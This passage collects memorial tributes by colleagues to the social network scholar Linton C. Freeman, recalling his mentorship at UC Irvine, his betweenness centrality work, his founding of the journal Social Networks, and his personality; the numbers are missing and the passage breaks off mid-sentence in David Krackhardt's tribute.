with sue freeman. at the dawn of the internet in - , this project provid- ed then state-of-the-art computer communications capabilities (phone modems and computer termi- nals) to link several dozen scientists working in the emerging field of social networks. the goal of the experiment was to facilitate exchange of information about the rapidly developing discipline, but it also highlights lin’s continued fascination with the social context of scientific enterprises. he was also an ac- tive supporter of the international network for social network analysis (insna), the professional organ- ization of the network analysis community, and its flagship meeting, the sunbelt conference. some of lin’s personal predilections (including his passionate advocacy for conference logistics that would allow him to windsurf, as well as his determination that the meeting always be welcoming to newcomers) left a lasting mark on the culture of the conference. al- ways an evangelist for social network analysis, lin worked tirelessly to bring new researchers into the field – whatever their home discipline might have been. it is a testimony both to his tenacity and to his charisma that one can to this day find many social network researchers whose entree into the field was an encounter with lin. lin’s own exposure to structural and network perspectives started early and ran deep. his father was a genealogist who emphasized the importance of family relations. as an undergraduate at roo- sevelt university, lin’s mentor was st. claire drake, by all accounts a genuine intellectual and captivat- ing lecturer. drake had been a student of allison davis at the university of chicago and had worked on the now classic deep south study (allison davis, burleigh b. gardner, and mary r. gardner, ). drake introduced lin to the deep south research in the late s, so at that point lin would have encountered the quintessential two-mode network of southern women attending social events (as an aside, decades later lin published “finding social groups: a meta-analysis of the southern women data”, a review of more than studies that had analyzed the davis, gardner, and gardner data.). at the university of hawaii, the geographer for- rest pitts introduced him to hägerstrand’s diffusion models and harry ball pointed him toward bavelas and leavitt’s experimental work on communication connections (insna) structures. as a phd student at northwestern, lin was deeply influenced by don campbell, who was at the height of his work on reliability, validity, and measurement, themes that continued throughout lin’s own research. lin also met morry sunshine at northwestern and they embarked on a very fruitful series of studies of community leadership. lin iden- tified morry as someone who was most influential on his thinking and the two remained close friends. lin moved to uc irvine in as dean of the school of social sciences. at uci he joined an ac- tive group of social network faculty and graduate students, including john boyd, doug white, and lee sailer. lin quickly converted others to social net- works, notably kim romney and bill batchelder, and influenced a steady stream of graduate students (jeff johnson, david krackhardt, katie faust, steve bor- gatti, sue freeman, and alaina michaelson kanfer, to name a few from lin’s early years at uci). at the time of his arrival, there were no departments in the school of social sciences. lin’s presence was the catalyst for the formation and steep ascent of the uci social network research group, a focal point for re- search and training at irvine that continues to be ex- tremely active. he also helped establish one of the first systematic graduate curricula in social networks within the department of sociology, which has gone on to become the training ground for a large number of doctoral students (both from sociology and from other fields). a member of the institute for mathemati- cal behavioral sciences, he also boosted the visibility of network-related research within the institute, and was central in recruiting social network researchers to uci. lin received a number of awards for his contribu- tions during his career. among his more notable hon- ors, he held the unique distinction of being a two-time recipient of the georg simmel award from the inter- national network for social network analysis, and re- ceived the james s. coleman distinguished career award in mathematical sociology from the mathe- matical sociology section of the american socio- logical association. in , insna named the early career award for contributions to the study of social networks after him, recognizing not only his own re- markable intellectual accomplishments but also his long record of mentoring and supporting young peo- ple. for many junior colleagues who survive him, this is perhaps the most fitting honor for a man who gave so much of his time to encouraging others in their own research. for those who had the good fortune to work closely with him, lin is remembered as a person of infectious enthusiasm, great intellectual energy, and strong convictions. never shy about express- ing his opinions – often in forceful language – lin was always willing to engage in intellectual debate. but he also took criticism graciously, and encour- aged a spirit of no-holds-barred inquiry among his peers that was at once fun, rigorous, and irrever- ent. he brought out the best in his students and his colleagues alike, challenging them to be better sci- entists, to pursue the truth wherever it led, and to enjoy life along the way. he left his mark on the so- cial network field, on uc irvine, and on all of us who benefited from his presence. those who travel in the wake of the “big kahuna” (so dubbed by a number of his colleagues) have a lot to live up to. but we are richer for his many gifts to us, and, were he here, he would be urging us to sail on to shores he had not yet seen. we hope that our collective voyages do honor to his memory. an open door jeff johnson there are many reasons to celebrate the life and career of lin freeman. as cart- er and katie point out, he has been one of the most influential intellects in social network analysis. but what i most celebrate about lin was his kindness, open- ness, and, most of all, his mentorship. i believe a sto- ry about my time at uc ir- vine as a graduate student vividly illustrates this. i was a graduate student from to . during the latter three years of this lin was the dean of the school of social scienc- es. the school of social sciences at uci was itself a unique place. there were no departments and faculty from across the social sciences had offic- es among the seven floors that were assigned in no particular disciplinary pattern. so, a geographer could be next to a political scientist who was next to an economist and so on. this led to a very dif- ferent academic environment. although i was an anthropologist, i interacted extensively with psy- chologists, economists, sociologists, etc. the dean before lin, and eventually lin, had his office on the th floor of the social science tower. although the dean’s office had a door that directly accessed the hallway, the door was always shut and any access to the dean’s office was through an adjoining sec- a collection of tributes to linton c. freeman retary’s office, with the secretary as gatekeeper. so as a graduate student before lin’s time, i had very little interaction, if any, with the dean (i can’t even remember seeing him). i remember the buzz about the arrival of the new dean, an athletic look- ing man with a full head of white hair. however, as a graduate student i thought little of it since, as the who sang, “meet the new boss, same as the old boss.” but these expectations were quickly dashed. soon after lin took over as dean, i would notice the door to the dean’s office that opened to the hallway was occasionally open, wide open, with lin often at his desk, at times with his feet on it. i don’t exact- ly remember how it all transpired, but i eventually found myself in his office talking about something networks or something windsurfing or something hawaii, since both of us had spent time at the uni- versity of hawaii. here i was, a graduate student having conversations with the dean across a whole range of topics, and not just once, but regularly. i could not have fathomed at the time how unique this really was for a broad range of reasons. a par- ticularly memorable discussion in his office cen- tered on the validity and reliability of respondent’s self-reports of social network interactions. russ bernard, peter killworth, and lee sailer (an irvine graduate) had just come out with the first of a series of papers on the problem of informant accuracy in the collection of social network data. i remember a number of lively discussions about the topic with lin and they were incredibly stimulating. lin would talk about things with conviction and passion and with a style that i would, over the course of my aca- demic life, try to emulate. these discussions about informant accuracy, not just with me but with many others, led to, in my mind, an exciting intellectual period examining many aspects of informant accu- racy that contributed to not only breakthrough’s in social network analysis, but also in the study of cul- ture. over time the open door was not just limited to lin’s office. eventually the door to lin and sue freeman’s house was also open to me. often when i was in laguna, where they lived, i would stop by and talk with both lin and sue. their hospitality and mentorship extended well into my academic career. in retrospect both lin’s and sue’s kindness and mentorship was a gift. i am now a full professor at a research one univer- sity. i often walk by the office for the dean of the col- lege of arts and sciences at my university. despite my advanced status, the dean’s door is not open. lin’s open doors are a testament to his character and uniqueness, and a vivid reminder of the human being he was and will always remain in my memory. forever connected: linton c. freeman alaina michaelson kanfer i first met lin in the summer of , at a new graduate student picnic when sue freeman, his wife, ran up to me, grabbed my arm, asserted “you belong with us,” and pulled me over to meet lin. they were partners; in networks, in science, and in life. that is how i experienced lin and sue. and that is how they mentored me, at uc-irvine and beyond. when lin was getting impatient for me to final- ize my dissertation topic, i simply could not choose. should i contribute a methodology for role analysis following lorrain and white, or should i investigate the how social relationships impact the diffusion of in- novations in the spirit of ev rogers? sue listened pa- tiently and proposed the perfect solution: why not do both? aha! the role of social relationships in the diffu- sion of a scientific specialty, specifically, role analysis. thank you, lin and sue, for helping me crystalize my lifelong interest in the sociology of science. while he was simply “lin” with his doors open, and feet on the desk in his social science tower office at uci, i saw him transform into linton freeman the ele- gant speaker at the sunbelt conferences. in his dress beach clothes (long pants and shoes – sandals) he would saunter into a large packed meeting room. with a booming voice, and piercing eyes that softened into an impish grin he would take the spellbound audience along with him on his intellectual journey to construct a definition, devise a method or discover an answer. lin was a consummate story-teller. lin was a great teacher. he could take any task or idea, break it down step by step and communicate it. he was such a good teacher, in fact, that he could take a city-girl from the midwest, with no athletic abil- ity, and teach her how to race in windsurfing regattas! he would explain how to prepare a meal – kung pao chicken, korean kalbi, osso bucco – with the same precision and enthusiasm as explaining betweenness connections (insna) centrality. to this day i cannot peel a tomato in boiling water without thinking of lin. i think lin’s skill at teaching stems from his love of the subject, a genuine desire to share, and his focus on simplicity. a simple answer. a simple explanation. any complex idea could be broken down into sim- pler steps. lin asserted that the only reason math ap- pears confusing is because the teacher is making it confusing. his explanation for that: either the teacher doesn’t understand it, or even more nefarious, they make math sound confusing so they can appear smarter! i had the privilege of witnessing clear math communication when i was sue’s teaching assistant. this was a required course – statistics – and students voluntarily filled the social science lecture hall. they listened, they learned and they enjoyed. learning to windsurf was so much more impor- tant to me than i imagined. by including me in their beach culture, lin and sue modeled a good “work/ life balance.” never missing an opportunity to study a network, we perfected participant observation data collection on the beach; social networks among windsurfers! but looking back, the most important part of windsurfing was the time it gave me with lin, driving to and from dana point, doheny beach, or on more ambitious days, mission bay in san diego. dur- ing those rides we talked about everything. lin reg- ularly gave me mini-lectures about his views on how a social group is defined by proximity, similarity, and common fate which he learned from don campbell at northwestern. he was fascinated with the work of eleanor rosch on cognition and categorization and spent quite a bit of time trying to figure out how her results translated to social networks. we also talked about the world. about the human race and scary things like nuclear war. lin reassured me that with every step we take backward, we take two steps forward. this belief has helped sustain me through- out my career as i found myself at the epicenter of revolutionary new technologies, such as the internet browser and social media, and now genomics, which have the potential for bad, and good. i think lin was an optimist. as opinionated, and obstinate as lin appeared, i knew him to be extraordinarily open-minded. he thought i was crazy when i talked about the sense of smell in networks, however, every few years he sent me an article or book implicating olfaction in networks among human and other creatures. the scientific journals in which he chose to publish is a testimony to lin’s intellectual range, for instance, journal of social and biological structures, brain and behavior sci- ence, international journal of man-machine studies as well as classics like american journal of sociolo- gy and american anthropologist, garnering well over , citations to date according to google scholar. all this while he was establishing the journal social networks as a conscious effort to transform the field into a normal science. when my life and career veered outside the inner circle of social networks, lin and sue’s genuine in- terest in me, my family and my work never waned. recently, in response to my email updating them on my role at the carl r. woese institute for genomic biology, lin wrote to me, “glad to hear you are still learning. that’s my favorite activity.” clear thinking, open mindedness, optimism, work/ life balance, and a love of learning, especially when it comes to science. this is what i learned from lin freeman, my advisor. i am thankful to him and to sue for their mentorship and friendship, and i am thankful to the social network community for this opportunity to reflect and share. lin freeman was my mentor steve borgatti i started graduate school (uc-irvine, school of social sciences) in to study cognitive anthropology. af- ter a couple of years, i left school to work at a consult- ing company (selling “cultural services”), then moved to a more conventional market- ing research firm, and then came back to school. when i came back, everything was different. the freemans had arrived. i didn’t take to them right away. they seemed almost too magnificent. it was like having a king and queen of the school of social sciences. and it bothered me that during presentations, they would keep scanning the audience instead of fixing their full attention on the speaker (little did i know that, just a few years later, they would publish a terrific paper (freeman, romney and freeman, ) based on at- tendance at colloquium). things changed when i moved to an office on the th floor of the social science tower, where lin’s office was located. his door was always open, and there were always people in there, if not forming a cluster at the door. often the discussion took the form of a debate and was about something scientif- ic, for lack of a better word. i remember at least two days of discussion about discrete versus continuous models of social reality. a collection of tributes to linton c. freeman even though i loved cognitive anthropology, over time, my dissertation became wholly networky, and my advisor kim romney booted me over to lin. lin was an intense mentor. he had very strong views (or, at least, very strong expressions of views). for exam- ple, i remember him telling me in no uncertain terms that no student of his was going to read mainstream sociology journals: they would rot your brain and crip- ple your thinking. i was also never to use lisrel – a substitute for thinking. and when i said something he didn’t like, he would say no! with a very expressive combination of hurt, disbelief, and exasperation in his voice. he really cared about what you said and did not tolerate bullshit. lin never talked to me about my career. he didn’t tell me how to get a job, how to prepare to be a pro- fessor, how to review a paper – anything about the professional side of the business. what he did do was try to develop me intellectually. one of his mentoring techniques was to ask me to look at a measure and see how it related to other measures. the first one he asked me to do was robinson’s a, which i spent a week analyzing. another was his own segregation measure s. these exercises were invaluable because they taught you that there are underlying grammars to measures, and obvious locations where different options may be taken. they taught you to see under- lying similarities and differences. lin once told me with some passion that the most important distinction in social network analysis was r.h. atkin’s distinction between backcloth and traffic. so i read atkin ( ) and didn’t understand a word of it. but the distinction and the weight lin placed on it stuck with me. i now realize that several of my best papers are essentially elaborations of that distinction. what i loved most about lin were his presenta- tions. there are a lot of great speakers in our field, but lin was amazing. he had an incredible voice and physical presence, and he had a mesmerizing sto- ry-telling style. i used to sit in on his undergraduate networks class just to hear him tell the foundational tales of our discipline. i especially loved his truly dra- matic reading of the bavelas-leavitt experiments. but more than that, a wonderful and important thing about lin was that his conference presentations were exactly like his classes. the objective was always to explain an idea. obfuscating, dressing up, over-complicating, name-dropping, reifying, over-promising and p-hack- ing were simply not part of the equation. many of his talks would begin with a simple observation and start drawing out implications that had gone unnoticed – like a forensic pathologist saying ‘do you see this line here? that could only have come from a large weight attached to the other side of the body [….].” i thank lin for my career, including everything from the long arm of his social capital to his wax-on wax- off attempts to get me to think deeply and not just sufficiently. lin freeman was my mentor. in memoriam: tribute to linton freeman russ bernard my introduction to lin’s wonderful eclectic schol- arship goes back to , when i was a graduate stu- dent of anthropology. i was fascinated by the possibility of using cultures as units of analysis in a statistical study. and so, my intro- duction to linton freeman’s work was his article on using guttman’s method for scaling societal complexity and then his book, elementary applied statis- tics. in , when i was working with peter killworth at scripps institution of oceanography, in san diego, i heard about some conferences on network analysis being held in hawaii by linton freeman and realized that was the same linton freeman who had written my stats text. later that year, i went to west virginia university, in morgantown and a year later, the math- ematical social science board of the social science research council funded my proposal to hold a con- ference on social network analysis at cheat lake, west virginia – a sylvan, idyllic spot near the univer- sity. i was thrilled when lin accepted my invitation to the conference. by then, lin was teaching at lehigh university in bethlehem, pennsylvania, about miles from morgantown, having recently arrived from dalhousie university in halifax, canada. and why was lin in halifax? because, as lin ex- plained it to me, after four years of living in a lease- hold bungalow on the water in hawaii, he had no pension and he and sue had no house. he accepted an endowed chair at dalhousie and then another at lehigh within a year. he was, he said, edging his way back to hawaii. in december , i attended a conference in ha- waii that lin had called at the east-west center on the campus of the university in honolulu and learned that lin was still trying to get back there. he took several of us out on a hobey cat and steered it close to the shore, so we could all see the house he and sue had lived in while he was at the university there. i still laugh connections (insna) every time i remember that scene: lin waxing poetic, going on about living on the island, water sports, and social networks. in , he and sue managed to get to california … only about two-thirds of the way back to hawaii from halifax, but they did manage to get a really nice house. i miss lin’s wit and his impatience and his un- relenting enthusiasm for science and for passing it all on. lin was an inspiring teacher and he never stopped teaching. even now. linton freeman – the networker barry wellman lin freeman was always at sunbelt social net- work conferences – and always visible – he invaria- bly stood in a central spot outside the meeting rooms schmoozing with whoever came along. i used to be annoyed at lin because he never, ever came to hear one of our team’s talks. but then i realized that he was doing what he did best – networking with every- one – and mysteriously, he knew what everyone was doing, from his central spot in the hallway. it is only as i write this remembrance that i real- ize that lin’s key scholarly writing professed what he practiced. he was between us all – at the sunbelt, on socnet, and in-person. his most cited scholarly articles by far are about “betweenness”: “centrality in social networks conceptual clarification” ( ) has , cites (september , ), followed by “a set of measures of centrality based on betweenness” ( ) with , and the later ( ) “centrality in valued graphs: a measure of betweenness based on network flow” – coauthored with steve borgatti and doug white – with . and the second biggest cita- tion is to various forms of the ucinet software (devel- oped with steve borgatti, martin everett) and others that help us to discover betweenness, et al. among our research subjects. lin was a networker from before the instant when i first met him. in the early s, he and his wife/ partner sue freeman organized an nsf-supported online network of about a score of social network scholars: a listserv before there was such a thing. it turned out we didn’t have much to say to each other on a daily basis, but lin and sue were smart enough to organize an in-person meetup at his then-home base of lehigh so we all bonded in-person as well as online – just at the start of the self-conscious devel- opment of the social network movement. then, until their sad recent passing, lin and sue were a great team – thinking, organizing, and playing together. while the nsf experiment nicely foreshadowed the internet, lin’s two foremost accomplishments were just beginning. those at uc irvine can tell you about lin’s relentless leadership in forging a strong social network analytic movement there. but to my mind, lin’s even more important leg- acy was his lead in the mid- s in founding and editing our social networks journal. he thought of it and secured the contract with elsevier, when social network analysis was scarcely known. importantly, lin lead the way in defining the journal as a broad journal of “structural analysis” – connecting theory and substance with the methodological innovations that social network analysis is sometimes limited to. betweenness was not a measure – it was a way of thinking. lin’s work was a key to the mid- s transforma- tion of social network analysis from a vague move- ment to a coherent program. it was part of a triad: lin and the journal working separately but together with russ bernard and associates founding the an- nual sunbelt social network conference, and bev wellman and i founding insna – the international network for social network analysis. lin gave his passion to linking social science with mathematics in thinking about social networks. a deep networker, he developed and linked the ideas and people that have helped to define our field broadly and move it forward. and he was a strong supporter of colleagues such as steve borgatti, katie faust, and stanley wasserman as they developed the methodological vocabulary and tools to enable systematic research. i close with a characteristic story: one night the phone rang with lin on the line. “it turns out that our founding mother, elizabeth bott, was raised in toronto a collection of tributes to linton c. freeman by interesting parents. could you help me find out more?” yes, i could and the results are in our only written co-production, “a note on the ancestral to- ronto home of social network analysis” – in which we showed that young elizabeth bott was the first child to wear a snowsuit (connections , november, : pp. - ). this was mostly a lin show, and it was a treat to work with him. he was a lover of life, ideas, windsurfing, food, mentoring – and ideas. bev and i fondly recall seeing him at the sunbelt – net- working in his vividly-colored shirts. “let’s be serious – but casual,” lin would say – and role model. right man, right time ron burt lin freeman was a man of generosity and scien- tific elegance who found his time. that he no longer walks this earth is a knife to my heart. i am grateful to katie faust and carter butts for crafting their broad appreciation of lin. there is left to add only our idio- syncrasies. i highlight two by which i learned to distin- guish and admire lin. i was first struck by lin’s generosity. i met lin in the late s, when i was a new assistant professor and he was a senior professor at lehigh university. as lin describes in his development of social net- work analysis, social network analysis (sna) in the s was fragmented, wide open for the application of alternative points of view. it was exciting, but it was also lonely. lin provided a sense of community. lin drew you into intellectual challenges that engaged your mind in the company of others similarly challenged. lin didn’t give you a membership so much as he brokered con- nections between people likely to find one another engaging. the sense of community emerged as a by-product of shared intellectual engagement. lin did this through his teaching (ask david krackhart how he got into network analysis), through his conferences (from which i retain so many memories of friendships emergent), and through his journal, social networks, and his concomitant early work on bits of software that became ucinet. i was among those who argued with lin against creating the journal (i and others pre- ferred the goal of taking over a mainstream institution to assert the legitimacy of sna). at the same time, lin and i were discussing computer subroutines and i ar- gued that it would be better to have special-purpose software targeted for substantively successful kinds of analysis versus generic software that did a little bit of everything (personal computers were smaller back in the day – my first network software for a personal computer ran on an osborne). what i missed in my arguments was the important role that a journal and software would have in creating a sense of community. outside a few people asso- ciated with prominent university centers, social net- work analysis was a fugitive enterprise in the s. i, like so many others, felt that we were on the outside looking in. and i, like so many others, found intellec- tual community around lin freeman. it was a per- fect example of an invisible college network – people connected indirectly through their strong admiration for a central figure. perhaps lin had a such a good feel for young fugitive scholars perhaps because he had spent much of his own career on the edge of the mainstream. this is what i meant by lin finding his time. at the same time that lin brought community to social network analysis, sna gave lin a community to lead. to my mind, there is currently no scholar in sna with lin’s generous charisma, but it is also true that sna is no longer the fugitive enterprise it was, in need of the charisma lin brought to us. it would be difficult for a guru to pull together today the commu- nity that lin successfully created back in the day. lin and sna met at a time when each was a blessing to the other. the second of lin’s qualities that stays with me is his scientific elegance. he had a taste for simple, rep- licable prediction. he admired it in others, and took me to task when he (often) found it absent in my work. discussing explanations with lin took me back to my undergraduate courses in the natural sciences. the touchstone work to which i often return is lin’s initial proposal for his “betweenness” index (about half of the thousand google cites to lin’s work are to his betweenness index – which indicates the importance of his index at the same time that it indicates lin is equally recognized for diverse works other than his index). in a issue of the american sociological association’s social network journal, sociometry, lin proposed a measure of the extent to which a person brokers connections between others (i.e., stands “be- tween” others). the proposal is simple, elegant, but connections (insna) lin goes on to show how his proposed index does a more consistent job of predicting in a classic study the key outcome for which a more familiar measure had been used (picture of steve borgatti). one would like to believe that routine practice involves simple argument combined with evidence of improved key prediction in comparison to prior measures. it is not routine. it is rare. most network measures are pro- posed in complicated text, with no more empirical ev- idence than numerical illustration of how to compute the measure. lin’s ( ) proposal is an exemplar to which i return from time to time when in need of an aspirational goal. i learned of lin’s death when his daughter, sta- cey, responded to an email message i sent to lin asking about a convenient time to visit. upon hearing the news, i stopped what i was doing and stared at my desk for a long while, my world a darker, colder place. he will forever walk with me a silent partner – likely telling me i could do better. a tribute to lin freeman pat doreian when thinking about lin, my thoughts follow three distinct but interlinked strands. the first centers on friendship. the second features issues related to the social organi- zation of research fields. the third strand concentrates on doing network research. i write about all three in this order while thinking about lin and his many contribu- tions to my life, the nature of the social networks field, and the brilliance of his academic contributions. friendship on a personal level, having lin as a close and great friend for such a long time enriched my life immense- ly. when lin formed friendships, he remained com- mitted to these relationships and provided constant support. i am sure many others have experienced this as well. but in writing about lin as a friend, it is impossi- ble to not fully include sue freeman. together, they formed a fine couple living a rich and full life. togeth- er, they provided a kind of role model worthy of em- ulation. esther and i rented apartments with them in paris on multiple occasions as well as a house on oahu in lin’s beloved hawaii. these were times of immense fun involving discussions about life – both social and regarding research issues, the places where we were, good food and fine wine. when lin did things, he went ‘all in’ when doing them. it did not matter if this was downhill skiing, wind surfing, or cooking. he excelled in all three – as well as in doing coherent and influential research. lin did not care much about dealing with finances or real estate, tasks sue handled with aplomb. they had a nice division of labor in organizing their lives. both were forceful individuals. as noted by others, lin had firm views and held them with passion. he could change his mind on an issue and hold firm to an op- posing view with equal vehemence. yet he would ar- gue his side with humor and grace. he could listen to other views without wanting to be dominant. despite his many accomplishments, i never saw any effort at self-aggrandizement on his part. social organization of the social network field others have noted that he founded social networks, the premier journal of the field, and edited it for a very long time. he had a clear vision for the role this jour- nal could play as a venue for publishing important work and how it could help to define our field. espe- cially important was the breadth of his commitment to encouraging interdisciplinary work across multi- ple fields. disciplinary departments tend to be insu- lar turf-protecting machines designed to keep within narrow definitions and strong exclusives impulses. lin would have none of this. put differently, he was catholic in encouraging multiple approaches and dif- ferent ways of doing research so long as it was rigor- ously defined within sound research designs. both lin and sue were socially active at the annual sunbelt social network conferences both in sessions and, more importantly, outside sessions when a lot of ideas are generated in free-flowing discussions about our field and potential future directions. i look back fondly at lin ‘holding court’ as these sunbelt gath- erings, especially as they grew larger. he would sit in some public area. others would be drawn to talk with him, learn from him, and enjoy his company. his creation of the nsf funded electronic infor- mation exchange system (eies) experiment with a gathering of researchers also helped define the emerging field. currently, we take for granted the free flow of information on the internet. but this experi- ment was in the early days of this form of commu- nication. even though we exchanged messages at an incredibly slow baud rate, we had a sense of the a collection of tributes to linton c. freeman future thanks to another aspect of lin’s vision of what could be done. lin’s contributions to the social network literature my idiosyncratic career path from mathematics to social science in england meant that my entry into the social network field had nothing to do with lin! indeed, in the late s i had not even heard of him. i was busy trying to generalize many of the theorems characteristic of the early work done at the university of michigan and associated with the work of frank harary and doc cartwright, among others. i did not meet lin until the eies gathering mentioned above. in many ways, i wished i had met him earlier. without doubt, some of his most influential, and highly cited, work dealt with centrality. others are bet- ter placed to comment further about his contributions in this realm. i was struck particularly by the clarity of his articulation of some different conceptions and for- mulations of this concept. until he brought such clar- ity, the concept had been rather fuzzy and was used sloppily. he was clear about the substantive mean- ing of these different concepts and the importance of selecting the one most appropriate measure given a specific research endeavor. i am sure that he would be appalled by the impulse of so many to compute a lot of centrality measures without thinking through the rationales for using them. here, i will focus on only two productions involv- ing lin. early on, norm hummon and i were develop- ing methods for citation networks that have become known within the rubric of ‘main path’ analysis. lin had collected the citation network for years of the centrality literature. with characteristic generosity, he gave us his data. we analyzed them and sent him a draft of a manuscript. he wrote a paragraph that led him to becoming a co-author. it was a (positively) so- bering experience for us. we had some neat results, but he transformed them with a deeper understand- ing of the broader context of this area. he turned a good paper into a very good paper and, critically, forced us to broaden our perspective. it was one of the most valuable lessons he taught us. no doubt, students fortunate enough to have had lin as one of their faculty members will have experienced many such learning experiences. the next study featuring lin and sue was about informant accuracy (or inaccuracy) developed by russ bernard, peter killworth, and, later, lee sailer. by questioning the quality of the typically collected network data, this line of research rattled many cag- es. while some responded with irritation or a sense of foreboding about collected social network data, lin responded in a typically deeper fashion. the design of lin and sue’s study was pure elegance. attend- ance data for a long running seminar at irvine were collected. following one session, with a time lapse, the participants were asked about who was there. of course, there were errors in the form of forget- ting some who were there and claims that some not attending on that occasion were there. by consid- ering the social organization of the seminar and the programs from participants came, both types of er- ror could be accounted for. it was another example of considering a broader context to understand the operation of social processes to generate deeper un- derstandings of social life. on the future my stating that i will miss lin and sue greatly counts as a total understatement. no doubt others will share this sentiment. the creation of the set of tributes in this volume testifies to this. the nature of our field was shaped indelibly by lin, in terms of his clear vi- sion as to what was possible for doing social network research, his ability to organize events critically im- portant for our field, and the great support he gave to so many of us. we must continue to do quality re- search for this is the only way forward for our field. perhaps more importantly, this work will be inspired by his acumen and a sense of standing on the shoul- ders of lin as a giant in the field. lin freeman is science elisa bienenstock in my mind and memory, lin freeman is science. when i think of lin, i think of the scientific method. not because i took research methods from lin, i did not. for me, lin personified the promise of science. my contact with lin was sporadic. when i met with him some things were constant, and others were not. there was a persistence of curiosity, energy, humor, kindness and generosity. what differed were the the- ories he passionately espoused about the way the world worked. at any point in time lin enthusiastically and emphatically would argue in support of a position on one or another topic (from coffee to methods), and then a short time later, i would find he had abandoned or updated that view. new data, new evidence, new measurement demanded an update. lin easily es- chewed that which “was not supported” by reason and data and revised his theory. lin had no conventional connections (insna) biases. he did not presume based on sex, race or any other “sociological” variable associated with personal characteristics. lin evaluated everything and everyone based on the data presented to him. not constrained in his search for knowledge, lin would seek out any data and master any method to answer a question or solve a puzzle that enticed him. this made lin the ide- al teacher, researcher and mentor. it was obvious that for lin science was not a vocation. lin lived, loved and embodied science. thoughts of lin evoke thoughts of the beauty and promise of science done right. for me, when i think “science,” i see lin. freeman dependency and distance ulrik brandes lin freeman was, quite liter- ally, a towering figure. while others are infinitely more qualified to give personal accounts of their interac- tions with him, for me he symbolizes my relationship with the social sciences. i was trained as a com- puter scientist and special- ized in algorithmics. as a doctoral student in the s, i regarded the social sciences in general, and lin’s contributions to the pe- culiar science of social networks in particular, as highly interesting but only mildly impressive. in the absence of deep mathematical concepts and challenging proofs, it seemed that a bit of extra reading and learning a few names and ideas would suffice to be able to contribute to the field of social networks like the pros. little did i know. in michael ende’s children’s book jim button and luke the engine driver, a mr. tur tur appears as a giant from afar and the closer you get the more he shrinks to what eventually is a rather normal person. the opposite was the case with lin and his work: to the contrary and to this day, he has grown bigger and bigger the closer i got to grasping where the issues even started. lin, i have come to realize, had thought through many of these issues, albeit decades ago. his appro- priation of mathematics was often ahead of its time, however, so that we have yet to give birth to ideas that in retrospect will turn out to be conceived already in his work. in a last article he saw published in the journal he founded and shaped, we, with steve borgatti, picked up on one such idea from a quarter of a century ago. while the associated paper has been cited fair- ly, i dare say rarely for its most important aspects, in- cluding by myself. two concepts involved in this work, an asymmetric dyadic relationship indicating the de- gree to which an actor depends on another to reach the rest of the network, and a closely related notion of distance in terms of the average number of intermedi- aries on shortest paths (think weighted networks!) are essential in linking two of the most important central- ity indices, betweenness, (which lin introduced) and closeness (for which he gave crucially distinct inter- pretations in terms of efficiency and independence). our conversations were confined to sunbelt and email but i will remember him as having an aura of unassuming depth and open-minded firmness. his approach to interdisciplinarity was not one of lectur- ing about the things he knew better. his rigor was of a different kind than is known to those trained in the exact sciences. it is thus easily underappreciated, and yet so much more convincing and inspiring when you admit of it. i will be grateful for the example he set, and my way to honor him will be to refer to the relations men- tioned above as freeman dependency and freeman distance. thoughts on the passing of linton freeman david krackhardt perhaps no one is more responsible for me pursuing a career in studying social net- works than lin free- man. the story of how i took up the challenge to use network analysis to study organizations is a bit strange, but ex- emplifies lin’s role in many of our lives. he was a true intellectu- al, one who thrived on discourse, even argu- ment, but with serious curiosity and respect. he didn’t suffer fools lightly, but he did engage, even when you might disagree with him. my background was organ- izational psychology; his interests lay in sociological explanations. my training emphasized applications, de- riving practical solutions to managerial problems. he preferred science for its own sake. he often told me that social science was not mature enough for us to be a collection of tributes to linton c. freeman making sound judgments or conclusions about com- plex organizational problems. social scientists should spend our efforts, he would say, focusing on sound and basic research into fundamental human behavior questions. applications were better left to consultants or other pretenders. despite these differences in per- spectives, he seemed to enjoy my company and our conversations about such issues. he never insisted that i adopt his view on these partisan topics; rather he seemed to thrive on the discussions because of these differences. i always felt respect from him, even liking, in spite of views that diverged from his, and despite the fact that i was clearly a kid just beginning in my chosen field and he was an established, eminent scholar in his. his support and guidance were key to my converting from a student of job attitudes to the study of social structure in organizations. my conversion was not gradual, but almost road to damascus-like, and it is due to both his kindness and intellectual enthusiasm. the particulars are re- vealing about lin as a scholar and as an inspirational leader in the field. by , i had spent four years in a phd program as a research assistant to lyman porter, a renowned organizational psychologist who published regularly in the most prestigious apa jour- nals. my dissertation proposal, fully supported and accepted by my committee, was to study attitude changes in junior auditors as they joined and were absorbed into one of the large professional auditing firms in southern california. there were eight big au- diting firms in the area i could choose from to study. one by one, however, they turned me down, until only arthur anderson was left. my contact at arthur an- derson, a senior partner at the local office, was en- thusiastic about my proposed study, saying that the firm could gain important insights into how they bring along young employees into the aa professional fold. i called my contact at arthur anderson to tell him that he was the winner that i had decided to go with their offer to study them. he then gave me the calamitous news: “david, our lawyers won’t let you come near our firm or our new employees to study them. appar- ently, there is too much liability assumed by the firm with such an arrangement.” i was devastated. my ca- reer plans, all my aspirations, my whole life went out the window with that phone call. the graduate school of management at irvine, where i was a student, occupied the rd floor of so- cial science tower. the top floors, floors - , con- tained the school of social sciences, which in those days was an interdisciplinary array of scholars with no departmental structure or affiliations. having just got off the phone with arthur anderson, i was in a sorry, depressed state. i entered the building on the ground floor, walked into the elevator, not sure what i was go- ing to tell porter, my advisor. for some reason, one that i cannot begin to recall, i failed to push the rd floor button on the elevator and instead pushed the button for the th floor. i don’t recall doing that; all i recall is that when i stepped off the elevator i was in unfamiliar surroundings, wondering where i was. no one was on the floor, except a tall gentleman with shocking-white hair, wearing sandals and a flowery short-sleeved shirt (it was january). he looked at me, probably noticing that i was lost and confused, and said kindly, “can i help you?” i had never met him be- fore, but i recognized him from pictures i had seen. he was the dean of social sciences, linton freeman. i was embarrassed. i didn’t know what to say in response to his question. i couldn’t just tell him, “oh, i’m sorry, i pushed the wrong button on the eleva- tor. i meant to go to the third floor.” so, instead, i just made something up on the spot. i said, “oh, i came to see you. someone told me i’d be interested in your research.” an avuncular smile came over him, and he invited me into his office (corner office, with a great view). he spent the next one and a half hours telling me stories about network analysis and how this per- spective is different than the one i was likely to have on social phenomena (he was right about that). at the end of that session, he suggested that i sit in on a phd and faculty seminar he and doug white were running together. he also mentioned that harrison white would be sitting in on the seminar, too. i had no idea who any of these people were, but i certainly had nothing better to do, so i decided to take him up on his offer. at the first day of the seminar, lin handed me a type-written carbon copy of a book manuscript. there was a magical twinkle in his eye when he said, “here, you’re an organizations person. this is a book written by a young sociologist who studies networks and organizations. your job is to read this manuscript and tell us what it says.” when you have to explain the contents of a new book to a room full of experts, you read the book very carefully. it was ron burt’s first book, toward a 